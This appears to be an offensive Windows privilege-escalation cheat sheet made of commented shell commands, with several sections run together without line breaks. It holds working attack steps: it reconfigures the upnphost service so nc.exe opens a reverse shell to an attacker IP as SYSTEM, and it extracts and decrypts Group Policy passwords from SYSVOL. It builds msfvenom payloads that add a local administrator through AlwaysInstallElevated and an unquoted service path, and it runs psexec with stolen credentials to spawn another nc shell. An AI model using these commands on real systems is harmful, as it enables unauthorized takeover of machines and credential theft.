# check for serices with weak permissions
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# check for the found services above
accesschk.exe -ucqv upnphost
# upload nc.exe to writable directory
sc config upnphost binpath= "C:\Inetpub\nc.exe -nv <attackerip> 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
# check the status now
sc qc upnphost
# change start option as AUTO-START
sc config SSDPSRV start=auto
# start the services
net start SSDPSRV
net stop upnphost
net start upnphostlisten on port 9988 and you'll get a shell with NT AUTHORITY\SYSTEM privileges
# Look up ip-addres of DC
nslookup nameofserver.whatever.local
# It will output something like this
Address: 192.168.1.101
# Now we mount it
net use z: \\192.168.1.101\SYSVOL
# And enter it
z:
# Now we search for the groups.xml file
dir Groups.xml /s
# decrypt the password in it
gpp-decrypt <pass>reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
# From the output, notice that "AlwaysInstallElevated" value is 1.Exploit
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
# Place 'setup.msi' in 'C:\Temp'
msiexec /quiet /qn /i C:\Temp\setup.msi
net localgroup Administratorswmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
# check for permissions of folder path
icacls "C:\Program Files (x86)\Program Folder" Exploit
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
# Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
sc start unquotedsrvc
net localgroup Administratorspsexec using found credentials
# upload nc.exe to a writable directory
psexec.exe -u <username> -p <password> \\MACHINENAME C:\Inetpub\nc.exe <ip> <port> -e C:\windows\system32\cmd.exe